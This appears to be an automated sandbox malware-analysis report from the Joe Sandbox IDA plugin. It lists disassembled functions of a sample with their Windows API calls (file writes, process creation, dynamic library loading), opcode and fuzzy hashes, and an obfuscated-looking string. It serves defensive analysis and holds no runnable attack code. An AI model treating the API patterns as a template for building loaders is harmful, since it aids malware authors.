                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
                                                  • Instruction ID: e1ca38fbe1868b0530a5cca2aefb0608b46060051e5a62990b8a86f9073b7715
                                                  • Opcode Fuzzy Hash: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
                                                  • Instruction Fuzzy Hash: 61912370D04228CBDF28CF98C8547ADBBB1FF44305F14856AD856BB291C778AA86DF45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
                                                  • Instruction ID: c8babd12d4b9043659ede3bd230c10fd4be49189821a01af26e4b19fb55261c2
                                                  • Opcode Fuzzy Hash: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
                                                  • Instruction Fuzzy Hash: B1813571D04228DBDF24CFA8C8847ADBBB1FF44305F24856AD456BB281C778AA86DF45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
                                                  • Instruction ID: 95d77a19c0962547fc3f67c13c4944abdc30b9b20558c44938f244593de0d4a6
                                                  • Opcode Fuzzy Hash: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
                                                  • Instruction Fuzzy Hash: 49713471D04228CBDF24CFA8C8847ADBBB1FF48305F15806AD856BB281C7386986DF45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
                                                  • Instruction ID: 33b9de73c5357426475d1ecb6718d507a7f793f52192090568aa5f1be2fe3f26
                                                  • Opcode Fuzzy Hash: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
                                                  • Instruction Fuzzy Hash: D8714671E04228CBDF28CF98C8847ADBBB1FF44305F15856AD856BB281C7786986DF45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
                                                  • Instruction ID: eebb37c65e2131d6119e05978ba22ffeb7e1a1a57c5d17d20a151e235b5fbeda
                                                  • Opcode Fuzzy Hash: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
                                                  • Instruction Fuzzy Hash: DD714771E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7786A86DF45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • WriteFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,00410755,Star EBurea3 KogeEPa.beEUrea Eapp.iE pposE UndeDBrobyECagg.CStockEPuste2De.inFGland6Isv,nF varsAtjansFLimewEAm.sb8Afstn9ZebueBCri,p6ChromATele.9SubumBHeaviF HaevAProto8ExistBAfsv,3Hyd,oFAutob6DrainFSoftwABesvaFbr,ndE Bade9 Hjem3AdvokAFil.s9 Spi,AKo.mu9tungeASt,0040357E,Star EBurea3 KogeEPa.beEUrea Eapp.iE pposE UndeDBrobyECagg.CStockEPuste2De.inFGland6Isv,nF varsAtjansFLimewEAm.sb8Afstn9ZebueBCri,p6ChromATele.9SubumBHeaviF HaevAProto8ExistBAfsv,3Hyd,oFAutob6DrainFSoftwABesvaFbr,ndE Bade9 Hjem3AdvokAFil.s9 Spi,AKo.mu9tungeASt,00410755,00414EF0,00004000,?,00000000,004033A8,00000004), ref: 00406238
                                                  Strings
                                                  • Star EBurea3 KogeEPa.beEUrea Eapp.iE pposE UndeDBrobyECagg.CStockEPuste2De.inFGland6Isv,nF varsAtjansFLimewEAm.sb8Afstn9ZebueBCri,p6ChromATele.9SubumBHeaviF HaevAProto8ExistBAfsv,3Hyd,oFAutob6DrainFSoftwABesvaFbr,ndE Bade9 Hjem3AdvokAFil.s9 Spi,AKo.mu9tungeASt, xrefs: 00406224
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID: Star EBurea3 KogeEPa.beEUrea Eapp.iE pposE UndeDBrobyECagg.CStockEPuste2De.inFGland6Isv,nF varsAtjansFLimewEAm.sb8Afstn9ZebueBCri,p6ChromATele.9SubumBHeaviF HaevAProto8ExistBAfsv,3Hyd,oFAutob6DrainFSoftwABesvaFbr,ndE Bade9 Hjem3AdvokAFil.s9 Spi,AKo.mu9tungeASt
                                                  • API String ID: 3934441357-2464786353
                                                  • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                  • Instruction ID: 6296e445ee025582091cb162a3efd7a4c9b40fecddc6e186669f82422f4bfe72
                                                  • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                  • Instruction Fuzzy Hash: 00E08C3221021AABDF10AE548C00EEB3B6CEB013A0F02447AFD16E3050D231E83097A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ReadFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,00414EF0,Star EBurea3 KogeEPa.beEUrea Eapp.iE pposE UndeDBrobyECagg.CStockEPuste2De.inFGland6Isv,nF varsAtjansFLimewEAm.sb8Afstn9ZebueBCri,p6ChromATele.9SubumBHeaviF HaevAProto8ExistBAfsv,3Hyd,oFAutob6DrainFSoftwABesvaFbr,ndE Bade9 Hjem3AdvokAFil.s9 Spi,AKo.mu9tungeASt,004035FA,00008001,00008001,004034FE,00414EF0,00004000,?,00000000,004033A8), ref: 00406209
                                                  Strings
                                                  • Star EBurea3 KogeEPa.beEUrea Eapp.iE pposE UndeDBrobyECagg.CStockEPuste2De.inFGland6Isv,nF varsAtjansFLimewEAm.sb8Afstn9ZebueBCri,p6ChromATele.9SubumBHeaviF HaevAProto8ExistBAfsv,3Hyd,oFAutob6DrainFSoftwABesvaFbr,ndE Bade9 Hjem3AdvokAFil.s9 Spi,AKo.mu9tungeASt, xrefs: 004061F5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID: Star EBurea3 KogeEPa.beEUrea Eapp.iE pposE UndeDBrobyECagg.CStockEPuste2De.inFGland6Isv,nF varsAtjansFLimewEAm.sb8Afstn9ZebueBCri,p6ChromATele.9SubumBHeaviF HaevAProto8ExistBAfsv,3Hyd,oFAutob6DrainFSoftwABesvaFbr,ndE Bade9 Hjem3AdvokAFil.s9 Spi,AKo.mu9tungeASt
                                                  • API String ID: 2738559852-2464786353
                                                  • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                  • Instruction ID: f029eba0d3a9f8ebddca737992f63761e7b4746d0aa70cfc26448402395c61e3
                                                  • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                  • Instruction Fuzzy Hash: 5DE08632154119EBCF106E908C00EEB379CEF15350F014876F921E7440D230E8328FA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00008001,00000000,00000000,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 0040339B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                  • Instruction ID: 810e563441ec60ddb2e304251acab09d4dc6a46a8481b8ea59e7f14a092257d1
                                                  • Opcode Fuzzy Hash: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                  • Instruction Fuzzy Hash: E231B170200209BFDB129F59DD44E9A3FA9EB04355F10843AF904EA191D3788E51DBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageW.USER32(0040A230,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                  • Instruction ID: 4cdfa14fa51073ec67c7732ce5b449902c092ffb61bdcee16cd85da0f6320b18
                                                  • Opcode Fuzzy Hash: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                  • Instruction Fuzzy Hash: 0F01F4327212209BE7295B389D05B6B3698E710354F10863FF855F6AF1DA78CC429B4C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 004057EA
                                                    • Part of subcall function 0040464D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040465F
                                                  • OleUninitialize.OLE32(00000404,00000000), ref: 00405836
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: InitializeMessageSendUninitialize
                                                  • String ID:
                                                  • API String ID: 2896919175-0
                                                  • Opcode ID: 6b48ba6f2f212ba91ce3a94f30354a0bb9d691122d035e2291a9dc674f3f10d0
                                                  • Instruction ID: 47b15979fd2771e4c3211fb1205fa32a21028b5b356e028cb2016eb217598776
                                                  • Opcode Fuzzy Hash: 6b48ba6f2f212ba91ce3a94f30354a0bb9d691122d035e2291a9dc674f3f10d0
                                                  • Instruction Fuzzy Hash: 9EF09073A006009AEB116B54AE01B6B77A4FBD4705F05843AEE84632A1DB794C128B9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                  • CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID:
                                                  • API String ID: 3712363035-0
                                                  • Opcode ID: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
                                                  • Instruction ID: 40cf053be3b9956ee682ea3cdb0c0f8171e7446c395677da6238e6dd92eb787c
                                                  • Opcode Fuzzy Hash: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
                                                  • Instruction Fuzzy Hash: A4E0BFB4600219BFFB109B64EE49F7B7B7CEB00648F418425BD14F2551D77498149A7C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: ShowWindow
                                                  • String ID:
                                                  • API String ID: 1268545403-0
                                                  • Opcode ID: 6eb5507e7e2db22e9f7eaab50b21dbb6b10998bbd87ae98348b2a8804cc9e867
                                                  • Instruction ID: 17a32db838fa4f6b21cf6124d10406fee823eddbf4804472be84e5c753e6f22f
                                                  • Opcode Fuzzy Hash: 6eb5507e7e2db22e9f7eaab50b21dbb6b10998bbd87ae98348b2a8804cc9e867
                                                  • Instruction Fuzzy Hash: 60E04F32B11214ABCF15DBA8EDD086EB3B6EB48320350443FD102B3A90CA749C058B18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,00403755,0000000C,?,?,?,?,?,?,?,?), ref: 00406A88
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3
                                                    • Part of subcall function 00406A06: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
                                                    • Part of subcall function 00406A06: wsprintfW.USER32 ref: 00406A58
                                                    • Part of subcall function 00406A06: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A6C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: 09a5520475afffee645b4664441d986c1138b09cf986c3d6b2a713b3520f987f
                                                  • Instruction ID: b294046d3e4dddd9dd595f306a5883e4a37f4b9faaa0bea25d2c73fe5553ab8f
                                                  • Opcode Fuzzy Hash: 09a5520475afffee645b4664441d986c1138b09cf986c3d6b2a713b3520f987f
                                                  • Instruction Fuzzy Hash: DFE08636704610AAD610BA709E48C6773A89F86710302C83FF546F6140D738DC32AA79
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(00000003,00403118,00437800,80000000,00000003), ref: 00406176
                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406198
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
